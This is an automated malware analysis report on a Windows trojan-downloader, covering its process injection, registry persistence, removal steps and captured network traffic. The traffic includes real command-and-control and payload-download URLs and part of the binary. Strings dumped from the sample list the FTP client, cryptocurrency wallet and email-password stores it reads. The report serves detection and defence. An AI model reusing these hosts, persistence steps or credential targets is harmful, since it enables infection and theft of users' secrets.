Trojan.Win32.Yakes.lhpr (Kaspersky), Trojan.Generic.14918644 (B) (Emsisoft), Trojan-Downloader.Win32.Moure.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 1784a24cb1de74990d64c9681a0d52f9
SHA1: 0da515afb8b0e960a0d39d6050db87b0ba466e2b
SHA256: ad5f5fc0da1832175eaa589b1751b5d56c8cf6a8a1c9047821d04a4df518c655
SSDeep: 1536:stDiorTuf5 E3Pkc1f3ZVldwl8gu35ZnHUWNbM8GVD37Ue1zZaR8crQ TeNZPm/ :stDhCJ3KEBUW1Gl7xViKlN6WXIj
Size: 105984 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-03 21:48:15
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-Downloader creates the following process(es):
%original file name%.exe:1096
vrsvps.exe:1932
vrsvps.exe:1924
The Trojan-Downloader injects its code into the following process(es):
wuauclt.exe:656
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1096 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe (601 bytes)
Registry activity
The process %original file name%.exe:1096 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 F6 20 F4 A5 3E 2F BF 5D 48 ED D8 60 05 CF B1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"" = "%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe -a"
The process vrsvps.exe:1932 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 35 A6 47 B2 E1 76 8B AE CB 41 B3 47 C5 64 AC"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "vrsvps.exe"
The process vrsvps.exe:1924 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 00 EC F4 86 B9 28 38 F3 14 A3 09 76 51 4E 17"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "vrsvps.exe"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1096
vrsvps.exe:1932
vrsvps.exe:1924 - Delete the original Trojan-Downloader file.
- Delete or disinfect the following files created/modified by the Trojan-Downloader:
%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"" = "%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe -a" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .ihuzseh | 4096 | 83112 | 83456 | 4.84191 | 4469bd475345986feeb9852d888f6179 |
| .rdata | 90112 | 16152 | 16384 | 2.59772 | e81e6e057791bc6790945f4256b44c96 |
| .data | 106496 | 18508 | 4608 | 1.60315 | 59b5f5e9b558e6eeda46d72dc9059601 |
| .rsrc | 126976 | 16 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://pro7778.com/pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware SVGA II&ocl=0&skype=0 | 153.92.96.79 |
| hxxp://glennmetales.com/backup/xmlrpc/css/file.exe | 50.63.40.1 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /backup/xmlrpc/css/file.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: glennmetales.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 11 Sep 2015 09:10:29 GMT
Server: Apache
Last-Modified: Mon, 03 Aug 2015 18:50:36 GMT
ETag: "19e00-51c6ca52fb629"
Accept-Ranges: bytes
Content-Length: 105984
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........dd.f.7.f.7.f.7...7.f.7...7.f.7...7.f.7.f.7.f.7...7.f.7...7.f.7...7.f.7Rich.f.7........................PE..L...o..U.................F..........g........`....@.....................................................................................................................................................@............`..$............................ihuzseh.D.......F.................. ..`.rdata...?...`...@...J..............@..@.data...LH..........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................Hl0xWBCK9Xs1kHF/alxi mMFWUeP9lTzueOaaB1h302sN10VcA9IQylC9XZBq14A7tI2w/UCNl7MOASra1XaKpQuyHm7qrDu6DKczOovVOMEidFsnVhpa0MpxW1mz/QcUM7gLfKi036RebenVKEMVZ FLSmJeFSFCUtx91Xi7e9JYM5UlftcFqR084RpgAxFaeAine2CeS Yq6O3bYPwSgl5Wb0mYWUagtBapYcNA/GL17rHhpwmUvJf/Z7EVGWKO5a3pbSHKGOnUMATKNobCdGJrDv0hb8ikw1XrwwzEMfFvymrftGDaQKfE piPGHOiD1DFc avuxgrI6Y62HJi3zh4sRkYQjbGmfdClSApCek9JiGU1hil7Ghb3EKz2bCTTo bk/xzaiqvnS36U2rtfskYFPSmCYy5P/mXklvsuFdEW0KfNBvTVJkj5UGhXcX1j/C8panMaGiDRa6IM9rfYl1Gw4Q0CEA9WIulQ0FTU57sylVv00/QjfNIyyJG5Kl
<<< skipped >>>
GET /pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware SVGA II&ocl=0&skype=0 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: pro7778.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Sep 2015 09:10:29 GMT
Content-Type: text/html
Content-Length: 59
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
#update;hXXp://glennmetales.com/backup/xmlrpc/css/file.exe;HTTP/1.1 200 OK..Server: nginx..Date: Fri, 11 Sep 2015 09:10:29 GMT..Content-Type: text/html..Content-Length: 59..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.3.29..Vary: Accept-Encoding,User-Agent..#update;hXXp://glennmetales.com/backup/xmlrpc/css/file.exe;..
Map
The Trojan-Downloader connects to the servers at the folowing location(s):
Strings from Dumps
wuauclt.exe_656:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
wuauclt.pdb
wuauclt.pdb
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
_wcmdln
_wcmdln
_amsg_exit
_amsg_exit
msvcrt.dll
msvcrt.dll
ntdll.dll
ntdll.dll
ole32.dll
ole32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
USER32.dll
USER32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
zcÃ
zcÃ
version="6.0.0.0"
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
name="Microsoft.Windows.windowsupdate.wuauclt"
true
true
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
wuaueng.dll
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ReportNow
/ShowWindowsUpdate
/ShowWindowsUpdate
/CloseWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
Failed to load %s with error %X
wucltui.dll
wucltui.dll
wucltux.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
wuauclt.exe launched with command line %s
kernel32.dll
kernel32.dll
WUWeb
WUWeb
Report
Report
7.6.7600.256
7.6.7600.256
Global\WindowsUpdateTracingMutex
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
Windows
shell32.dll
shell32.dll
%s: %s [
%s: %s [
%s: %s
%s: %s
%s\%s
%s\%s
= Module: %s
= Module: %s
= Module:
= Module:
= Process: %s
= Process: %s
= Process:
= Process:
=========== Logging initialized (build: %s, tz: %s) ===========
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups2.dll
wups.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
Microsoft.WindowsUpdate
wupdmgr.exe
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Window %d is NOT a WU window
Done enumerating windows
Done enumerating windows
Quit for window %d failed: 0xlX
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Found %d explorer windows
Closing WU explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
%chdhd
hd-hd-hd%chd:hd:hd:hd
hd-hd-hd%chd:hd:hd:hd
Windows Update
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
wuauclt.exe
Windows
Windows
Operating System
Operating System
wuauclt.exe_656_rwx_000A0000_00009000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
KERNELBASE.dll
KERNELBASE.dll
=#= =:=[=
=#= =:=[=
Kernel32.dll
Kernel32.dll
Advapi32.dll
Advapi32.dll
Shlwapi.dll
Shlwapi.dll
Shell32.dll
Shell32.dll
User32.dll
User32.dll
WS2_32.dll
WS2_32.dll
Winhttp.dll
Winhttp.dll
Setupapi.dll
Setupapi.dll
Psapi.dll
Psapi.dll
Crypt32.dll
Crypt32.dll
msvcrt.dll
msvcrt.dll
OpenCL.dll
OpenCL.dll
hXXp://pro7778.com/pro/getter.php
hXXp://pro7778.com/pro/getter.php
mode=report
mode=report
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
SysWOW64\svchost.exe
SysWOW64\svchost.exe
System32\wuauclt.exe
System32\wuauclt.exe
\Software\Microsoft\Windows\CurrentVersion\Run
\Software\Microsoft\Windows\CurrentVersion\Run
ClassicFTP
ClassicFTP
HKCU\Software\NCH Software\ClassicFTP\FTPAccounts
HKCU\Software\NCH Software\ClassicFTP\FTPAccounts
CoreFTP
CoreFTP
HKCU\Software\FTPWare\CoreFTP\Sites
HKCU\Software\FTPWare\CoreFTP\Sites
FileZilla\sitemanager.xml
FileZilla\sitemanager.xml
CuteFTP
CuteFTP
Globalscape\CuteFTP\9.0\sm.dat
Globalscape\CuteFTP\9.0\sm.dat
Cyberduck\Bookmarks\*.duck
Cyberduck\Bookmarks\*.duck
FlashFXP\5\Sites.dat
FlashFXP\5\Sites.dat
FlashFXP\5\quick.dat
FlashFXP\5\quick.dat
LeapFTP
LeapFTP
LeapWare\LeapFTP\sites.dat
LeapWare\LeapFTP\sites.dat
NppFTP
NppFTP
Notepad \plugins\config\NppFTP\NppFTP.xml
Notepad \plugins\config\NppFTP\NppFTP.xml
VoyagerFTP
VoyagerFTP
RhinoSoft\FTP Voyager\FTPVoyager.Archive
RhinoSoft\FTP Voyager\FTPVoyager.Archive
SmartFTP
SmartFTP
SmartFTP\Client 2.0\Favorites\*.xml
SmartFTP\Client 2.0\Favorites\*.xml
SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml
SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml
TotalCmdr
TotalCmdr
GHISLER\wcx_PTF.ini
GHISLER\wcx_PTF.ini
WS_FTP
WS_FTP
Ipswitch\WS_FTP\Sites\ws_PTF.ini
Ipswitch\WS_FTP\Sites\ws_PTF.ini
Bitcoin\wallet.dat
Bitcoin\wallet.dat
Litecoin\wallet.dat
Litecoin\wallet.dat
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
export "
export "
reg.exe
reg.exe
SMTP User
SMTP User
SMTP Password
SMTP Password
IMAP Password
IMAP Password
POP3 Password
POP3 Password
75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
vrsvps.exe
vrsvps.exe